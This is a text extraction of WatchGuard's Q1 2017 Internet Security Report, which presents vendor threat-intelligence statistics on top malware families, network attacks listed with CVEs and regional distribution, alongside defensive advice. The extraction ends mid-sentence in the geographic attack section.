Internet Security Report: Q1 2017 • 2
Contents
Contents03 Introduction
04 Executive Summary
05 Firebox Feed Statistics
07 Malware Trends
08 Quarter-over-Quarter Malware Comparison
08 Malicious JavaScript Still Menaces
09 A Rise in Linux Malware
11 Evil Cross-platform Java Malware
11 Old Attacks: Malicious Perl Bot
12 A Pair of Generic Windows Trojans
12 Malicious Macros Hide in the Weeds
13 Geographic Malware Distribution
14 Zero Day vs Known Malware
15 Network Attack Trends
15 Top Network Attacks
16 Quarter-over-Quater Attack Comparison
16 Web Battleground Shifts to Servers
16 Web Application Attacks Move Up
17 StageFright Returns to the Spotlight
18 Geographic Attack Distribution 20 Firebox Feed Statistics: Defense Learnings
20 Malicious JavaScript in Email
20 Web-based Linux Malware
20 Brazilian Banking Malware Campaign
21 Top Security Incidents
22 The CIA Vault 7 Leaks
25 Marble Framework Defense Learnings
26 WatchGuard Threat Lab’s IoT Research Project
27 Responsible Disclosure: Ouvis C2 HD Security Camera
31 IoT Research: Defensive Learnings
32 Conclusion & Defense Highlights
Reset
A B
Reset
A B
The Firebox® Feed provides
quantifiable data and trends
about hackers’ latest attacks, and
understanding these trends can
help us improve our defenses.
Introduction
Internet Security Report: Q1 2017 • 3
IntroductionHave you ever wondered what
types of cyber attacks affect small
to midsize businesses (SMBs) and
distributed enterprises (DEs)? Well,
you’ve come to the right place.
WatchGuard’s Internet Security Report is based on
Firebox Feed data coming from more than 26,000
unified threat management (UTM) appliances that
are monitoring and protecting SMBs and distributed
enterprises around the world. This data gives us
insights into what types of network exploits, malware
infections, and advanced attacks are launched by
cyber criminals every month, and how they change
and update their attacks over time. We share these
trends and insights with you every quarter in our
Internet Security Report.
The report for Q1 2017 includes:
Many trends and discoveries from the Firebox Feed What types of malware do we catch most
often in the wild? Which network services do
attackers commonly target? What are the
most popular attacks in different regions of the
world? Which delivery mechanisms do cyber
criminals most regularly rely on? You can learn
all this and more in our Firebox Feed Statistics
section.
Top Story: CIA Vault 7 leaks Every quarter, you’re flooded with interesting
and relevant information, security stories and
incidents. Some of them can have industry-
wide effects. This quarter our researchers
comment on the CIA Vault 7 leak from Q1 2016
and share some additional technical analysis
you didn’t see in the news.
Latest Internet of Things (IoT) research The WatchGuard Threat Lab constantly runs
security research projects to study the threats
and issues affecting businesses today. For
the last few quarters, our researchers have
been analyzing the security of consumer
IoT devices. This quarter we disclose a
vulnerability we found in the Ouvic C2 HD
Security Camera.
Most importantly, defensive learnings While some might consider the threat
landscape interesting on anecdotal merit
alone, you can put these trends and learnings
to good use. We share these trends and
findings so that you can cater your defenses to
the latest attacks. We share various protective
tips throughout this report, and summarize
with our top learnings.
05
11
22
33
We’re excited to share our second report based on data analysis from our Firebox Feed, and our additional re-
search projects. We believe this quantifiable data gives us a deeper insight into the most prevalent threats our
customers face and how cyber criminals craft their latest attacks. Our quarter-over-quarter analysis also shows
how attackers evolve their techniques and focuses over time. We hope this report provides useful information,
and you make it a regular part of your InfoSec awareness and training. Thanks for joining us this quarter, and
read on for our latest threat landscape findings.
Summary
Internet Security Report: Q1 2017 • 4
Even when malware declines, other attacks rise. Consumers and businesses are
under the constant deluge of network attacks, phishing, and malware. Criminals
target Brazilian banks, nation-states anonymize their tools, and advanced threats
get past legacy defenses. If you want to keep your business online, you need to
stay vigilant against these attack trends so you can identify defenses for them.
This report provides some details around those and other trends. Here’s a high-level summary of some of the
things you’ll learn from this report:
• Linux malware is on the rise, making up 36% of the top malware we detected in Q1 (if you count PERL/Shellbot). We believe this increase comes from attackers targeting IoT devices.
• Legacy AV missed 38% of malware. In Q4, signature-based AV missed 30% of the threats we caught overall. This quarter, those misses increased 8% despite a general decline in malware detection overall. This means increasingly more malware evades traditional AV solutions.
• Threat actors take a break from hacking the holidays. Overall, threat volume decreased 52% in Q1 2017 compared to Q4 2016. We believe the drop in malware detections can be attributed to the absence of seasonal malware campaigns associated with various Q4 holidays, which increased overall malware instances during that period.
• Conversely, network attacks are up 37% compared to Q4, likely due to automated tools that always look for new victims.
• The web battleground shifted towards web servers. Last quarter, we saw more exploits that were used for drive-by downloads (web client attacks). In Q1, 82% of the top network attacks targeted web servers (or other web-based services).
• Our top ten XSS attack primarily targeted Spain. We aren’t sure why this particular cross-site scripting exploit was popular in Spain, but it was.
• Attackers still exploit the Android StageFright flaw. A mobile device vulnerability cracked our top ten attack list this quarter, breaking the previously unchallenged web attack theme.
• Criminals target Brazilian banks with cross-platform malware. We detected a large amount of email-based Java malware sent to victims in Brazil. We suspect this is part of the well-known Banloader banking malware campaign.
Those are just a few of the many trends this report explores. Read on for more in-depth explanations and
Executive Summary
In Q1, 2017 WatchGuard blocked over 4,151,210
malware variants (156 per device)*
7,072,178 malware variants
(266 per device)*
* average per participating device
Firebox Feed Statistics
Internet Security Report: Q1 2017 • 6
Firebox Feed Statistics
WatchGuard’s Firebox Feed provides quantifiable
data about the latest malware and network attacks
globally. The feed is a database of anonymized
threat data gathered from tens of thousands of
active Fireboxes around the globe. It records the
latest malware from our Gateway AntiVirus (GAV)
and APT Blocker services, and it archives the most
prevalent network attacks blocked by our Intrusion
Prevention Service (IPS) service. It also records
location data to learn how different threats affect
different geographic regions. It doesn’t, however,
capture any sensitive data about our customers’
networks or configurations, and allows customers to
optout of this feed whenever they like.
The Firefox Feed currently only captures data
from a fraction of our customers, since it relies
on customers running the latest versions of our
firmware. However, with information from over
26,000 devices, the Firebox Feed provides a
statistically relevant view into today’s threats.
This section of the report highlights the malware and
network attack trends our Firebox Feed uncovered in
Q1 2017. Here we share our analysis of these trends,
and provide defense tips that help you avoid the
latest malware and attacks.
This section of the report highlights the malware and network attack trends our Firebox Feed uncovered in Q1 2017. Here we share our analysis of these trends, and provide defense tips that help you avoid the latest malware and attacks.
The threat landscape does not stand still. Cyber criminals constantly change
their tools, tactics, and campaigns to exploit the most opportune attack
techniques of the time. Savvy attackers pay attention to seasonal events, pop
culture, and other technological trends to leverage the latest tricks to hack
more victims. To keep up your defenses, you must remain aware of the latest
threat trends. Using this report, you can fine-tune your defenses to block the
latest threats.
The information from over 26,000 devices, the Firebox feed provides a statistically relevant view into today’s threats.
Internet Security Report: Q1 2017 • 7
Malware Trends
Firebox Feed Statistics
Looking at those numbers, the first thing you notice
is malware detection dropped by about half, despite
the Firebox Feed having almost two thousand more
devices reporting in. Why is that?
We suspect this decline has to do with the
seasonality of malware campaigns. The last quarter
of the year includes many regional and global
holidays, such as Thanksgiving and Christmas. Many
of these holidays involve major shopping periods and
retail events like Cyber Monday and Black Tuesday.
Due to this increased spending, attackers specifically
target these holiday and shopping periods, which
probably attributes for the higher malware rates last
quarter. As we continue our report annually, we’ll
follow this trend to see if holiday-related malware
increases are common year-over-year.
Besides the obvious decrease in overall malware, we
also noticed a relative increase in advanced malware.
While APT Blocker detections decreased in Q1, they
decreased relatively less compared to the decline in
GAV detections (a 34% decline compared to GAV’s
52%). In general, that means more malware got
past legacy AV this quarter, and required advanced
Generic Dropper
PERL IRC Bot
Malicious JavaScript
Generic Linux Trojan
Generic Trojan
Generic Linux Downloader
Malicious JavaScript
Generic Java Downloader
Generic Linux DDoS Tool
Generic Bitcoin Miner
CATEGORY
FakeAlert
PERL/ShellBot
JS/Downloader.Agent
Linux/Exploit
Win32/Heur
Linux/Downloader
JS/Heur
Java/Downloader
Linux/Flooder
Generic36.AAVT
THREAT NAME
670,261
356,809
256,390
178,551
165,996
158,689
156,645
83,123
82,127
77,704
COUNT
Most cyber attacks involve malware. After breaching your network, criminals
usually want to establish “persistence,” meaning they want to find a way to
retain access to your computer and network. Typically, they install malware to
retain this persistence. This section details the malware-specific trends from
our Q1 2017 data.
Figure 1: Top Ten Firebox GAV Hits for Q1 2017
Our malware data comes from two Firebox services:
• The basic Gateway AntiVirus (GAV) service,
which uses signatures and static heuristics to
catch known malware.
• APT Blocker, our advanced malware prevention
service, which uses behavior detection to catch
new or “zero day” malware.
Let’s start with the raw Q1 2017 numbers:
• The Firebox Feed recorded threat data from
26,584 active Fireboxes; a 7.7% increase in
devices reporting in Q4 2016.
• Our GAV service blocked 7,072,178 malware
variants; representing an average of 266 malware
samples blocked per Firebox. This represents a
52% decline in overall malware compared to last
quarter, and a 56% decline in malware blocked
per Firebox.
• APT Blocker stopped an additional 2,568,727
malware variants; representing a 34% decline
from last quarter.
Internet Security Report: Q1 2017 • 8
Firebox Feed Statistics
malware detection techniques to block. This seems
to suggest that more threat actors are actively
creating malware that evades legacy protections.
Rather than analyzing these ten samples individually,
we’ll share the high-level trends they represent, and
go into more detail about some of the samples.
Quarter-Over-Quarter Malware Analysis
Only four of the malware samples from our Q4 2016
report made it to this quarter’s top ten. Specifically:
• FakeAlert
• Linux/Exploit
• JS/Downloader.Agent
• JS/Heur
Two of those threats traded places for relevance.
Last quarter, Linux/Exploit was the number one
threat, and a good indicator of increased IoT attacks.
This quarter, it’s still relevant, but has dropped below
FakeAlert, which took over the top spot. If you’d like
to know about either of these two samples, see the
malware section of last quarter’s Internet Security
Report. Meanwhile, the top JavaScript threats from
last quarter remain as relevant this quarter, which we
detail next.
Malicious JavaScript Still Menaces
JavaScript is a high-level scripting language most
commonly used on dynamic websites. While web
applications legitimately use JavaScript, attackers
commonly abuse it to help deliver malware.
Specifically, criminals tend to exploit malicious
JavaScript in two ways; either as malicious code
embedded on a website, or as malicious files sent via
email.
For the second quarter in a row, JavaScript malware
made up a large portion of the Firebox Feed top
statistics. Like last quarter, JS/Downloader.Agent and
JS/Heur both made our top ten list. Furthermore, we
continued to see many other malicious JavaScript
samples throughout our full top 100. In short, our
malware services block a lot of malicious JavaScript.
Network vs Endpoint Malware Detection:To evade detection technologies, modern malware
arrives in multiple stages. Rather than directly sending
you ransomware, attackers might send you a document,
that links to a website, that opens a malicious Java file,
that installs a dropper or downloader, which finally
downloads the actual ransomware onto the endpoint.
This means network AV solutions detect and block
malware at different stages in this deliver process than
endpoint AV. Network AV primarily “sees” the initial
droppers and downloaders from initial infection stages.
Whereas, endpoint AV may see the final malware.
For more on multi-stage malware, see this great post
from IBM X-Force.
As mentioned before, malicious JavaScript is either
hosted directly on a malicious website to facilitate
drive-by-download attacks, or delivered as an
attachment in a convincing phishing email. In the
email scenario, JavaScript malware typically acts
as the first-stage dropper in a multi-stage attack.
Malware authors hope their victims run the malicious
JavaScript so it can download the second stage
malware, which might be ransomware or a remote
access trojan (RAT).
In the case of web attacks, criminals use JavaScript
to launch browser and software exploits. In fact,
some of the samples our Fireboxes detected are
associated with web-based exploit kits like Angler,
Neutrino, and Rigs, which have previously delivered
ransomware like Locky and Nemucod.
Our data shows that malicious JavaScript plays a
big role in modern malware delivery, both over the
web and through email. Make sure you have security
controls that can identify malicious JavaScript,
including web reputation and advanced malware
protection services. We also encourage advanced
users to look into extensions like NoScript and
SafeScript, which can help you limit JavaScript while
also letting legitimate sites work. Finally, make sure
your users know never to open .JS files from an
email.
Internet Security Report: Q1 2017 • 9
Firebox Feed Statistics
A Rise in Linux Malware At least three of the top ten malware samples this
quarter target Linux, showing that cyber criminals
are focusing on this platform, likely for IoT-related
attacks.
Last quarter, Linux/Exploit was the number one
malware sample blocked. While it dropped to
number four this quarter, it’s joined by two other
Linux threats; Linux Downloader and Linux Flooder.
Combined, these three hits show attackers are
increasingly targeting Linux systems.
Here’s a quick description of each threat:
1. Linux/Exploit is a generic detection rule that
catches several executable Linux (ELF) trojans.
You can read more about it in our last report. In general, these trojans infect a device, and
then scan networks looking for any other
devices hosting Telnet or SSH services. Once
the Telnet or SSH host devices are identified,
the trojan attempts to log in to them using
default credentials or via brute force. Once
they have access, they hijack the device by
either downloading a copy of a malicious Linux
executable (which could be Linux/Exploit) or
by running a script to add the host to a growing
botnet (a la Mirai botnet).
Figure 2: Example of malicious Linux shell script caught by Linux/Downloader
RECENT SAMPLES:
78fae3e208de3bbadabe09f4996f0b44
cac62e5664152a357145747ba5dbe0a2
9a539a2aec2a815218abdf5c35b10c33
c92a0be3ff38cd24478ffcf8e35099c3
1a3029ed85c90411668583a9e271f0f5
ALTERNATE NAMES:
Linux/TrojanDownloader
Linux/ShellDLoader
Trojan-Downloader.Shell.Agent
Script.Trojan.Agent
RECENT SAMPLES:c9c50c4b28d5209c2366ac4ec531ae0c
a3b3572cccac880e33420316562814ce
e9b5716cac7e5e0df3a209456294a34c
ALTERNATE NAMES: Linux.CornelGEN
2. Linux/Downloader joined the top ten malware
list this quarter. Linux/Downloader is a signature
that generically catches common Linux dropper
or downloader shell scripts. Rather than catching
malicious Linux executables (ELF files) like Linux/
Exploit, this signature catches the malicious shell
scripts that some attackers (or trojans) run to
download and install additional malware onto a
hijacked Linux device.
Linux runs on many different architectures, such
as ARM, MIPS, and traditional x86 chipsets.
An executable compiled for one architecture
will not run on a device running a different
one. Thus, some Linux attacks exploit dropper
shell scripts to download and install the proper
malicious components for the architecture they
are infecting. Here’s a sample of one of the
many Linux downloader scripts caught by this
signature.
12
Internet Security Report: Q1 2017 • 10
Firebox Feed Statistics
3. Linux/Flooder also joined the Q1 top ten malware
list. This is another generic signature that
catches Linux-based distributed denial of service
(DDoS) tools. For instance, it catches tools like
the publicly released Tsunami tool. Tsunami is a
command line Linux tool designed to carry out
DNS amplification attacks. It’s based on an open
source DNS relay scanner called namescan. This
is one of the many possible Linux-based CLI
DDoS tools.
Linux/Flooder may also catch the DDoS tools
used by Linux-based botnets, like Mirai. As the
Mirai botnet showed us, Linux-based IoT devices
are a prime target for botnet armies. These
networked trojans often include tools for DDoS
attacks, as shown below.
RECENT SAMPLES:
3c0e9dbc29b74445664814b10b2ced82
bb326e31fdfc533e3e5293df13bb091a
e64079b3ccf906204474beca1f5cc41d
cc38121ea8efc86bcc5d446e2f7e4198
ALTERNATE NAMES:
Dos.Linux.Agent
Linux.Flood
Trojan.Linux.Flooder
Linux/Dnsamp
Linux.BackDoor.Tsunami
3
As an aside, one might argue that the PERL/ShellBot
variant we describe below also qualifies as Linux
malware, since it primarily targets Linux systems.
This is because they tend to have Perl installed by
default. However, we decided to leave it out of this
section, and describe it in more detail later in this
report.
In summary, Linux attacks and malware are on the
rise. We believe this is because systemic weaknesses
in IoT devices, paired with their rapid growth, are
steering botnet authors towards the Linux platform.
Owners of Linux-based devices, including IoT hosts
and traditional Linux servers, should ensure they
properly secure their systems from external attacks.
Blocking inbound Telnet and SSH, along with using
complex administrative passwords, can prevent the
vast majority of potential attacks.
Figure 3: Mirai Command and Control Server
Linux
Internet Security Report: Q1 2017 • 11
Firebox Feed Statistics
Evil Cross-platform Java Malware
Java is a general-purpose programming language
that is designed to run on many platforms.
Originally created by Sun Microsystems (now
owned by Oracle), Java is one of the most popular
programming languages used today. Everything from
web applications, to mobile devices, to normal client
software uses Java. People often confuse Java for
Javascript, but they are quite different. Javascript is
a high-level, runtime scripting language.
Unfortunately, Java has also developed a reputation
of insecurity. Over the years, researchers have
found countless vulnerabilities in the Java platform,
many of which allow attackers to bypass its
built-in sandbox, which is there to protect users.
Furthermore, sophisticated attackers are drawn
to Java because it runs equally well on Windows,
Mac, and Linux devices. Attackers exploit Java
downloaders in cross-platform attacks.
While Java threats were very common a few years
ago, this is the first time we’ve seen a Java threat
make our top ten list. Java/Downloader is a universal
signature that detects generic Java downloaders.
These bits of malicious code try to fingerprint a
victim’s operating system (OS), and then install the
corresponding malicious payload.
The most recent samples caught by Java/
Downloader are associated with a cross-platform
trojan called Banload, which targets South American
banks. This banking trojan infects both Windows and
Macintosh computers using this malicious Java code.
Our geographic data confirms this increase likely
relates to a South American bank attack campaign.
We’ll share more about this in our Geographic
Distribution section.
Old Attacks: Malicious Perl Shellbots
Last quarter, an old-style threat called a PHP
webshell made our top ten malware list. This quarter
that threat dropped entirely off our top 100 list,
only to get replaced with another outdated threat –
PERL/ShellBot.
PERL/ShellBot is a broad signature made to
detect malicious bots written in Perl (a high-level
programming language). Though Perl bots can run
on any platform with Perl installed, they tend to
affect Linux computers because they often install
Perl by default.
These malicious bots use the Internet Relay Chat
(IRC) service as a command and control (C&C)
channel for the attacker. Some of these malicious
Perl shellbots connect to IRC using the default port,
6667. However, others use non-standard IRC ports
like 23, or 3333, presumably to help avoid detection.
Like a normal botnet, attackers can leverage Perl
bots for just about any nefarious purpose, including
but not limited to DDoS attacks. Source code for
many Perl Shellbots have leaked publicly, resulting
in many variants based on the originals. Below is a
Github for one such sample used in for DDoS attacks.
JAVA/DOWNLOADER INFO: • Generic Java downloader
• Related to banking malware (Banload)
• Sample hashes: 2c1189b57ff0cfdd18618f51955df8f1 cb6d19921c635683798b4dcc86fe607f 4478732742b8ccbf252cbb71766eb86 f27b92b58f510932cd117c4248955c9 e9d0672646d0478b0b3a8a3d334ee32 ccfcf52d14a07e2d7fb780809e6b6b73
• Alternate names: Java.Trojan.Generic Java:Malware-gen Java/Banload.U Mal/DrodZp-A TrojanDownloader.Java
PERL/SHELLBOT INFO: • Perl-based IRC bot
• Related to ShellShock attack
• Sample hashes: 59b0f479a5ad937dd9d61635c4c855bc 66d85817e183b3e5120149721d3fcc19 1d37072882034f5a015fd3430f8169a7 8a838c86c038713b083b6fc07208ebc3 fe3323a44f0f536b94947dce2b229fc4
• Alternate names: Backdoor.Perl.Shellbot Unix/ShellBot Trojan.Perl.Shellbot
Internet Security Report: Q1 2017 • 12
Firebox Feed Statistics
Figure 4: Example of publicly available DDoS Perl bot
In late 2014, a critical Linux Bash vulnerability sur-
faced called ShellShock. This flaw made it trivial for
attackers to gain full root privileges on any Linux
server that exposed Bash. At the time, attackers
updated their malicious Perl bots to target this
ShellShock vulnerability. Some of the samples we see
associated with recent PERL/ShellBot detections are
targeting this ShellShock vulnerability. If you haven’t
already patched your Linux systems for ShellShock,
you should do so immediately.
A Pair of Generic Windows Trojans To round out our top ten list, we also saw a pair of
signatures that catch generic Windows trojans.
• Win32/Heur is about as generic a signature as
you get, and is known to catch many Windows-
based trojans, from Zbot and Zeus to Razy.
• Generic36.AAVT is also a broad signature that
catches Windows-specific malware. However, it’s
more specifically associated with Bitcoin Miner
trojans. This suggests a slight uptick in attackers
delivering Bitcoin mining malware in some
regions.
Malicious Macros Hide in the WeedsUnlike last quarter, malicious macro-based Word
documents did not make our top ten list. There was a
clear decline in overall malicious macro documents in
Q1. However, they’re still worth mentioning since we
see these malicious documents sprinkled throughout
our wider top 100 list.
Despite their decline, we recommend you continue
to warn your users against unsolicited documents,
and tell them not to enable macros if they do open
strange documents. See our last report for more
information on this waning threat.
Internet Security Report: Q1 2017 • 13
Firebox Feed Statistics
Figure 5: Malware detection by region
EMEA
56.6%AMERICAS
21.8%APAC
21.6%
Geographic Malware DistributionOverall, we see more malware blocked in EMEA than
anywhere else, with over 56% of malware caught in
this region. This continues the same overall regional
trend from last quarter. While this could have to do
with the sales and licensing of our products (APT
Blocker is popular in Europe), it could also suggest
criminals are launching more European malware
campaigns.
Our regional trends change for the remaining per-
centage of malware though. Last quarter, most of
the remaining malware affected the Americas, with
only 6% of malware found in APAC. This quarter,
the remaining malware is split evenly between the
Americas and APAC, at approximately 22% each. This
marks a significant increase in threats affecting the
Asia-Pacific.
We also saw quite a few standout geographic trends
for individual malware variants:
1. We primarily found PERL/ShellBot in two
countries. 53% of the hits were found in Malaysia,
36.7% were found in the United States, and the
remaining 10.3% was distributed throughout
eleven other countries. It’s unclear why these
Perl bots are primarily targeting Malaysia and the
United States.
2. 84% of Win32/Heur was found in India.
3. The generic Bitcoin miner (Generic36.AAVT)
primarily targeted Canada, with 95% of the
detections.
4. 97% of our Java/Downloader detections were
from Brazil, confirming this threat is associated
with a known banking malware campaign targeting Brazilian banks.
5. The Linux threats display a wide range of
geographic curiosities.
a. Linux/Exploit affected many European and
American countries, but had the highest
numbers in the U.S. and United Emirates.
b. Linux/Downloader mostly affected Germany,
Great Britain, and Malaysia, but few others
to the same extent.
c. Finally, Linux/Flooder primarily affected
Germany and France.
6. The JavaScript malware was found in a wide
range of countries, but Germany always lead the
list.
7. Though FakeAlert was found in over 100
countries, 44% came from Italy.
Malware affects all countries to some extent, but it is
interesting to see certain threats only affect specific
countries or regions. Pay close attention to the most
prominent threats by region, and consider adjusting
your defenses accordingly.
Though FakeAlert was found in over
100 countries, 44% came from Italy.
Internet Security Report: Q1 2017 • 14Internet Security Report: Q1 2017 • 14
Firebox Feed Statistics
GAV found 4,198,242 known malware
variants on boxes that also had APT Blocker.
Meanwhile, APT Blocker prevented 2,568,021 new malware variants on these same devices.
Zero Day vs Known MalwareAs mentioned in the sidebar above, Firebox custom-
ers can also use our optional APT Blocker service
to catch more advanced malware. APT Blocker runs
suspicious files in a next-generation cloud sandbox,
and monitors their behaviors to identify zero day
malware that would be missed by signature-based
detection solutions. When our GAV service doesn’t
detect anything bad, our Firebox can still run addi-
tional APT Blocker checks to find brand new threats.
By definition, if APT Blocker catches a threat, signa-
ture-based GAV missed it. By comparing these two
services, you get a good idea of the ratio between
newer “zero day malware,” which legacy AV solutions
might miss, compared to known malware.
That said, not all our customers have APT Blocker.
For a one-to-one comparison, we count the total
GAV hits only on boxes that have APT Blocker.
According to our Firebox Feed, GAV found 4,198,242
known malware variants on boxes that also had APT
Blocker. Meanwhile, APT Blocker prevented 2,568,021
new malware variants on these same devices. This
means at least 38% of the malware our systems
discovered was zero day, and missed by legacy AV
solutions.
This illustrates the critical importance of advanced,
behavioral-based malware detection solutions today.
Without them, AV solutions could miss more than
one third of the malware spreading online. This is
why so many networks that use basic AV become
victims of threats like ransomware. We highly recom-
mend you leverage advanced malware solutions like
WatchGuard’s APT Blocker.
OF MALWARE WAS38%ZERO DAY
Figure 6: Known vs Zero Day Malware
Internet Security Report: Q1 2017 • 15
At a high level, our IPS service blocked 4,151,210
network attacks, which averages to 156 intrusion
attempts per Firebox customer. This represents
around a 37% increase in the overall blocked network
attacks this quarter compared to Q4. While cyber
criminals may not have launched as many massive
malware campaigns, it appears that other types of
attacks are on the rise.
Network Attack Trends
Threat Affected CVE Signature Name Category Products Number Count
WEB URI Handler Buffer Web Server Windows web serverss CVE-2011-1965 532,565 Overflow - POST -1
WEB HTTP Basic Authorization Web Server All web servers CVE-2009-0183 192,899 Header Buffer Overflow
WEB Nginx HTTP_parse_chunked Web Server Nginx CVE-2013-2028 118,576 Buffer Overflow(1)
WEB HTTP Host Header Web Server Apache CVE-2003-0245 117,706 Buffer Overflow
WEB Cross-site Scripting -36 Web Client Any web application CVE-2011-2133 115,446
WEB Brute Force Login -1 Web Server Web app logins n/a 68,806
WEB-CLIENT Javascript Web Client All web browsers Multiple CVEs 49,376 Obfuscation in EKs - 75
WEB NetBSD tnftp fetch Web-based FTP tnftp (Apple, NetBSD, Linux) CVE-2014-8517 47,076 _url Command Execution(2)
WEB-CLIENT Javascript Web Client All web browsers n/a 36,874 Command Execution(2)
Android libstagefright mp4 tx3g Android buffer Android OS CVE-2015-3824 31,085 Atom Multiple Buffer Overflow -1 overflow
Figure 7: Top Ten IPS Hits Q1 2017
40.6% 14.7% 9% 3.8%8.8% 2.8%9% 3.6%5.3% 2.4%WEB URI
Handler Buffer Overflow - POST - 1
WEB HTTP Basic Auth
Header Buffer Overflow
WEB Nginx HTTP_parse_
chunked Buffer Overflow(1)
WEB-CLIENT Javascript
Obfuscation in EKs - 75
WEB Cross-site Scripting -36
WEB-CLIENT Suspicious
HTML Iframe Tag(4)
WEB HTTP Host Header
Buffer Overflow
WEB-CLIENT WEB NetBSD tnftp fetch_url
Command Execution(2)
WEB Brute Force Login -1
Android libstagefright
mp4 tx3g Atom Multiple Buffer
Overflow -1
Network Attack TrendsTo deliver malware, attackers must either rely on the mistakes of users, or
take advantage of vulnerabilities found in network software. In the case of
software vulnerabilities, WatchGuard’s Intrusion Prevention Service (IPS) is
designed to detect these client and server-side exploits, and prevent them
from working. This section of the report highlights the top network attacks.
Below are the top network threats seen during this
period.
Rather than analyzing each individual exploit (see
the links in the chart if you want more detail), let’s
look at quarter-over-quarter differences and overall
trends.
Internet Security Report: Q1 2017 • 16
Network Attack Trends
Quarter-Over-Quarter Attack AnalysisIn Q1, six of the network attacks from previous quar-
ter return to our top list. At a high level, not much
has changed with these six attacks. Almost all of
them moved up on the list, and they generally retain
the same order. The only exception is the “Suspicious
HTML iframe tag” issue, which dropped two spots to
ninth. While web-based attacks still dominate the top
threats, the scale has tipped from web client attacks
to web server attacks, which we will talk about next.
The Web Battleground Shifts to ServersLast quarter, web attacks dominated our top ten, fill-
ing all the spots on our list. This quarter, web threats
still dominate, but a mobile exploit cracked the top
10 for the first time. This quarter also saw a shift in
the type of web attacks. In Q4 2016, 73% of the top
web attacks targeted web clients (the browser and
its supporting software), not web servers. Now, only
three of the nine web threats on the list target web
clients. In the end, 82% of the top network attacks
target web servers (or web-based services).
This marks a significant shift in the mix of web server
vs client threats, and that trend extends into the top
20 as well. While a few more client vulnerabilities
show up in the wider top 20 list, it also includes more
web server flaws. We don’t think drive-by download
style attacks will go away, but it appears attackers
have focused their efforts and tools on trying to
exploit web server attacks. A couple of new web
server attacks also made the list, which we’ll cover
next. With the increase in web server attacks, we
recommend you harden your web servers, use a fire-
wall to limit access to any internal web services, and
keep your server software up to date with the latest
patches.
Web Application Attacks Move UpThough many of the web vulnerabilities in the top
threat list remain the same, Q1 saw two newcomers a
web application vulnerability and a login brute force
attack:
1. WEB Cross-site Scripting – 36: A web
application (app) vulnerability is a flaw in the
actual web app, and not in the server software.
This could include the code making up a common
web framework you use, or the custom code
you created specifically for your own web apps.
Common examples of web app flaws include
cross-site scripting (XSS), local and remote file inclusion, SQL injection (SQLi), cross-site request forgery (CSRF), and many more.
Last quarter, not a single web app vulnerability
made the top 10. This quarter, an XSS
vulnerability rose to number five. An XSS attack
allows an attacker to interact with a web app
as if they are the intended end user. However,
attackers typically need to trick you into clicking
a specially crafted link for the attack to work.
If you do fall for the link, the attacker can gain
access to that web app’s cookies, and any of your
other content on that site.
WEB Cross-site Scripting – 36 is one of many
broad signatures to detect generic cross-
site scripting attempts against your users. It’s
interesting to see web app attacks reach the top
10. We found three additional web app attacks in
the top 20 as well. Protecting against XSS attacks
is a twofold process, since the vulnerability lies
in a server web app, but the attack targets a web
client. For web app administrators, you should
visit OWASP.org to learn how to develop security
web apps (a broad topic we can’t cover in a short
report). For web users, you should be very careful
clicking unusual links.
2. WEB Brute Force Login – 1: While it doesn’t
technically catch a web app vulnerability, the
Brute Force Login IPS rule does catch an attack
that targets the login pages of web applications.
If you don’t program login throttling to your web
application, attackers can use tools like THC Hydra or the Burp Suite to try and brute force
user accounts on your website. This IPS rule can
catch web login brute force attempts by looking
for repeated connections from the same source
address.
With the increase in web app vulnerabilities in Q1,
we recommend web administrators audit their source
code. As mentioned earlier, OWASP.org is a great
resource for learning about protecting your web
applications.
Internet Security Report: Q1 2017 • 17
Network Attack Trends
StageFright Returns to the SpotlightAs previously mentioned, this quarter included
the first mobile-specific exploit to crack the top
threats list. StageFright is an exploit that targets
Android mobile devices and it first earned notoriety
in 2015 when researchers publicly disclosed it prior
to the BlackHat security conference. Specifically,
StageFright is a buffer overflow vulnerability in the
Android libStageFright system module, responsible
for handling video messages in Android mobiles. By
sending a carefully crafted video message, an attack-
er can exploit this buffer overflow to either execute
arbitrary code on the mobile device with full root
privileges, or at least cause the device to crash. You
can learn more about it in this Daily Byte video.
Over the course of 2015, various Android platforms
patched StageFright. However, not all users or ven-
dors keep their Android installs up to date, so many
mobile devices may remain vulnerable. Our Stage-
Fright signature catches some of the malicious MP4
files used to trigger this video-handling vulnerability.
It’s interesting to see this mobile threat make our top
attack list. Nearly two years later, not only is Stage-
Fright still present, but it’s prolific.
If you are worried about this mobile threat, we highly
recommend upgrading your Android operating
system (if it’s not patched already). Barring that,
some third-party texting applications can mitigate
the risk of StageFright by preventing mobile devic-
es from processing video messages automatically.
These applications will now ask whether you want to
download and play video messages. You should train
your users to treat all unsolicited video messages as
suspicious, and avoid clicking links or downloading
files you don’t expect.
In summary, the web is still the battleground but the
conflict has shifted vulnerabilities from the client to
the server. If you are a web administrator, use this as
an excuse to circle back and reevaluate your security
for web servers and applications.
By Source (WP:NFCC#4), Fair use, https://en.wikipedia.org/w/index.php?curid=47364979
Internet Security Report: Q1 2017 • 18
Network Attack Trends
Geographic Attack DistributionThe general regional attack trends we saw in Q4 2016
continued this quarter, with the majority of the top
network attacks happening in EMEA. We did see mar-
ginally fewer attacks in APAC and more in the Amer-
icas, but overall, the regional trends look very much
like our normalized one from the last report.
Besides the overall regional trend, our feed data also
shows interesting country-specific nuances between
the individual top attacks.
• 96% of suspicious iframes were detected in North
America. The Suspicious HTML iframe threat
overwhelmingly affected North America, with 96%
of the hits falling in the U.S. and Canada. Iframes
are legitimate HTML tags designed to create
frames on a web page. However, web attacks often
leverage malicious iframes to redirect victims to a
malicious site. If an attacker can hijack a legitimate
website, they often use iframes to force that site’s
visitors to another site hosting their web exploit
kit (EK). We suspect these hits have to do with
increased web attack campaigns in the U.S. and
Canada.
• The top cross-site scripting (XSS) attack
targeted Italy 90% of the time. We haven’t
attributed it to a specific campaign, but most XSS
attacks in our top threat list affect victims in Italy.
• NGINX is a popular, open-source web and email
proxy server. The NGINX vulnerability in our top
10 is an old, but serious, flaw from four years ago.
While not as dominating as the examples above,
53% of the “NGINX HTTP_parse_chunked buffer
overflow” detections come from Germany.
The remaining hits are spread between 17 other
countries.
• Likewise, 46% of “JavaScript Obfuscation in
EKs” were found in the U.S. While that may not
seem like an overwhelming majority, the addition
hits we spread sparingly in 45 other countries.
• Finally, 73.6% of the tnftp attacks are split
between Great Britain (42.6%) and Australia
(31%). By the way, tnftp is a popular FTP client
for BSD platforms. Though it is an FTP client,
this vulnerability involves how it connects to
HTTP URLs. We are not sure why attackers are
primarily targeting Great Britain and Australia
with these tnftp attacks. Other than sharing a
